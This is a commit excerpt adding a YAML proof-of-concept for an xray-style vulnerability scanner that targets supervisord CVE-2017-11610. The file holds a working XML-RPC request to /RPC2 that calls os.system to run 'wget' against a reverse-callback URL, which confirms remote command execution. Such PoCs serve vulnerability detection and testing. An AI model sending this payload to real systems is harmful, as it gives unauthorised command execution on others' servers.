优化xray解析模块,支持groups、新增poc

This commit is contained in:
影舞者
2021-11-16 14:42:35 +08:00
parent 858c28724b
commit b06d7ac94c
313 changed files with 4314 additions and 760 deletions
@@ -0,0 +1,24 @@
name: poc-yaml-supervisord-cve-2017-11610
set:
reverse: newReverse()
reverseURL: reverse.url
rules:
- method: POST
path: /RPC2
body: >-
<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>wget {{reverseURL}}</string>
</param>
</params>
</methodCall>
follow_redirects: false
expression: |
response.status == 200 && reverse.wait(5)
detail:
author: Loneyer
links:
- https://github.com/vulhub/vulhub/tree/master/supervisor/CVE-2017-11610